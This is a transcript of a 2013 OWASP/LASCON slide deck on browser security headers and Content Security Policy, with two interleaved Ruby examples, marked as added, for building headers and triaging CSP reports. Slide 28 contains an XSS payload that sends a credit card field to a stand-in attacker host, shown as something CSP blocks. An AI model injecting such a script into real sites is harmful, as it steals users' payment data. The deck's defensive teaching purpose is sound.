Owasp austin
  1. CSP To the Rescue
     @LASCONATX, April 30, 2013
  2. @LASCONATX April 2013, @ndm | @SeeEssPee | @sadb | @twittersecurity
     It's all about me
     I've been called a jackass
     I've been called an "appsechole"
     I have opinions
     Opinions are often wrong
     Please disagree with me
     That's how we learn
  3. CSP, Brakeman, ThreatDeck, Phantom Gang, Roshambo, Email developers, Email security
  4. Code review
     External reports
     Pen testing
     Static analysis tools
     Dynamic analysis tools
     CSP
  5. Get the right information to the right people
  6. Find bugs as quickly as possible
  7. Analyze from many angles
  8. Help people help themselves
  9. Do you use these?
     Content Security Policy
     X-Frame-Options
     HTTP Strict Transport Security
     X-XSS-Protection
     X-Content-Type-Options
  10. I'm already bored. Time to get awesomer.
  11. Security headers: leverage the browser for security
  12. Sweeeeet. I don't have to write secure code!
  13. Time of convergence
  14. Should you?
  15. X-Content-Type-Options
     Fixes MIME sniffing attacks
     Only applies to IE, because only IE would do something like this
     X-Content-Type-Options: nosniff
     zzzzZZZZZZzzzzz
  16. X-XSS-Protection
     Use the browser's built-in XSS Auditor
     X-XSS-Protection: [0-1](; mode=block)?
     X-XSS-Protection: 1; mode=block
     zzzzZZZ... huh? zzzzzzzz
  17. X-Frame-Options
     Protects you from most classes of clickjacking
     X-Frame-Options: DENY
     X-Frame-Options: SAMEORIGIN
     X-Frame-Options: ALLOW-FROM example.com
     zzz... oh hey, that's cool. Don't frame my stuff.
  18. X-Frame-Options (image only)
  19. Firesheep / SSL Strip
     Given I don't have an HSTS header
     And I have a session
     When I visit http://example.com
     Then I am pwned
  20. Other SSL fails
     Posting passwords over HTTP
     Loading mixed content
     Using protocol-relative URLs
  21. Strict Transport Security
  22. How hard is it to use?
     Base case:
     Strict-Transport-Security: max-age=10000000
     Do all of your subdomains support SSL?
     Strict-Transport-Security: max-age=10000000; includeSubdomains
  23. Content secur-a-wat?
     Content Security Policy is reshaping the security model
     It is a complicated spec with great differences across browsers
     It is not widely adopted
     However!
     It completely eliminates reflected and stored XSS
     It ensures that you never load mixed content
     It allows you to accept arbitrary HTML code from users
  24. Wat? Sounds cool.
     script-src, style-src, img-src, default-src, frame-src, connect-src, font-src, media-src, object-src, report-uri
  25. (embedded video; the slide text only says a QuickTime H.264 decompressor is needed to view it)
  26. Get rid of XSS, eh?
     A script-src directive that doesn't contain 'unsafe-inline' almost eliminates most forms of cross-site scripting.
     I WILL NOT WRITE INLINE JAVASCRIPT (written out seven times)
  27. (image only)
  28. But I have to...
     OK, then I'll inject:
     <script>var image = new Image(); image.src = "cyberhacker.com/steal?data=" + $('#credit_card').val();</script>
     FALSE! img-src violation, no XHR allowed
  29. Inline CSS too? WTF?
  30. How to apply?
     Secure headers! (poor name, I know)
     Open sourced earlier this year: https://github.com/twitter/secureheaders
  31. How does it work?
     It sets a before_filter that applies each header
     Values are based on options passed to the filter, or set in an initializer
     Easily overridden
     Secure by default!!!
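The header set from slides 15 to 31, built the way a secure-by-default filter would build it: defaults for every header, per-header overrides, and a CSP serialized from a directive hash, with a check for the 'unsafe-inline' mistake slide 26 warns about. This is an added example, not the secureheaders gem's own code or API; the default CSP sources, the option names and the /csp_report path are assumptions.

```ruby
# Added example (not the secureheaders gem's code). DEFAULT_CSP, the option
# names and the report path are assumptions chosen for illustration.
DEFAULT_CSP = {
  "default-src" => ["'self'"],
  "script-src"  => ["'self'"],
  "style-src"   => ["'self'"],
  "img-src"     => ["'self'"],
  "report-uri"  => ["/csp_report"]
}.freeze

# Serialize a directive hash into the header value the browser parses.
def serialize_csp(directives)
  directives.map { |name, sources| "#{name} #{sources.join(' ')}" }.join("; ")
end

# Slide 26's point: the XSS protection only holds while script-src (or the
# default-src it falls back to) does not permit 'unsafe-inline'.
def inline_script_allowed?(directives)
  sources = directives["script-src"] || directives["default-src"] || []
  sources.include?("'unsafe-inline'")
end

# Build the response headers. opts[:csp] overrides single CSP directives,
# opts[:headers] overrides whole headers (a nil value drops one, e.g. HSTS on a
# plain-HTTP dev server) and :hsts_include_subdomains adds includeSubdomains.
def security_headers(opts = {})
  hsts = "max-age=10000000"
  hsts += "; includeSubdomains" if opts[:hsts_include_subdomains]
  csp = DEFAULT_CSP.merge(opts.fetch(:csp, {}))
  warn "script-src permits inline script; XSS protection is off" if inline_script_allowed?(csp)
  headers = {
    "X-Content-Type-Options"    => "nosniff",
    "X-XSS-Protection"          => "1; mode=block",
    "X-Frame-Options"           => "SAMEORIGIN",
    "Strict-Transport-Security" => hsts,
    "Content-Security-Policy"   => serialize_csp(csp)
  }
  headers.merge(opts.fetch(:headers, {})).compact
end

if __FILE__ == $PROGRAM_NAME
  security_headers(hsts_include_subdomains: true).each { |k, v| puts "#{k}: #{v}" }
end
```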
  32. What about that security policy thingy?
     There are > 6 differences between these two header values (image)
  33. Yay for standards: https://t.co/f26WWx3r7y
  34. (image only)
  35. Long hair don't care (about browser inconsistencies)
  36. W3C: get involved!!!
     Key results from the face-to-face (F2F) in San Jose
  37. Line numbers and column numbers
     Previously, a report that was caused by inline scripts/styles was cryptic
     The original Firefox implementation contained a script-sample
     Evals / inserting script into the DOM would be buried in minified JS
  38. "sudo for JavaScript"
     Bookmarklets / plugins / etc.: how should they behave?
     Bookmarklets show clear intention; plugins are somewhat questionable
     They need to live outside the control of the parent page. But how?
  39. Reporting cross-origin
     The original implementation did not allow CSP reports to be sent to a URI that does not match the same-origin policy, using the eTLD
     e.g. https://ads.twitter.com can send reports to https://twitter.com, but not to http://twitter.com, https://support.twitter.com or https://twitter.com:3000
     As a result of the W3C face-to-face, the 1.0 spec shall say that reports can be sent anywhere!
     However, cross-origin requests not allowed by CORS will be "unauthenticated"
  40. script-(nonce|hash): the clash of the titans
  41. Future
  42. You mean there's more on CSP? The browser sends reports!
  43. What does the report look like?
     {"csp-report" => {
        "document-uri" => "http://localhost:3000/home",
        "referrer" => "",
        "blocked-uri" => "ws://localhost:35729/livereload",
        "violated-directive" => "xhr-src ws://localhost.twitter.com:*"
     }}
  44. Quiz: what does this report indicate?
     {"csp-report" => {
        "document-uri" => "http://example.com/welcome",
        "referrer" => "",
        "blocked-uri" => "self",
        "violated-directive" => "inline script base restriction",
        "source-file" => "http://example.com/welcome",
        "script-sample" => "alert(1)",
        "line-number" => 81,
        "column-number" => 1463
     }}
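The two reports from slides 43 and 44, run through a small triage routine that pulls out the directive, whether the violation was inline or an external resource, and the line/column location that slide 37 explains, then counts a batch the way a trending dashboard (slides 45 to 47) would. Added example, not code from the deck or from Twitter; the reports are reconstructed from the slides as valid JSON and the :inline / :external labels are this example's own.

```ruby
require "json"

# Constructed samples shaped like the reports on slides 43 and 44
# (the slides show Ruby hash output; these are the JSON a browser would POST).
SAMPLE_REPORTS = [
  '{"csp-report":{"document-uri":"http://localhost:3000/home","referrer":"",' \
  '"blocked-uri":"ws://localhost:35729/livereload",' \
  '"violated-directive":"xhr-src ws://localhost.twitter.com:*"}}',
  '{"csp-report":{"document-uri":"http://example.com/welcome","referrer":"",' \
  '"blocked-uri":"self","violated-directive":"inline script base restriction",' \
  '"source-file":"http://example.com/welcome","script-sample":"alert(1)",' \
  '"line-number":81,"column-number":1463}}'
].freeze

# Reduce one report to what a triager wants: directive name, violation kind,
# the page, what was blocked, and (when the browser sends it) the exact
# source location plus script sample that make inline violations readable.
def triage_report(json)
  r = JSON.parse(json).fetch("csp-report")
  violated = r.fetch("violated-directive", "")
  kind = (r["blocked-uri"] == "self" || violated.start_with?("inline")) ? :inline : :external
  location = r["line-number"] && "#{r['source-file']}:#{r['line-number']}:#{r['column-number']}"
  {
    directive: violated.split(" ").first,
    kind: kind,
    page: r["document-uri"],
    blocked: r["blocked-uri"],
    location: location,
    sample: r["script-sample"]
  }
end

# Count a batch by [directive, kind]: the series a dashboard trends, where a
# sudden rise in inline violations on one page is the anomaly worth a look.
def violation_counts(reports)
  reports.map { |j| triage_report(j) }
         .group_by { |t| [t[:directive], t[:kind]] }
         .transform_values(&:size)
end

if __FILE__ == $PROGRAM_NAME
  SAMPLE_REPORTS.each { |j| p triage_report(j) }
  p violation_counts(SAMPLE_REPORTS)
end
```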
  45. Monitor and tune ALL the things
  46. Splunk
  47. Trending and anomalies
  48. (image only)
  49. Header status page
  50. CSP, Brakeman, ThreatDeck, Phantom Gang, Roshambo, Email developers, Email security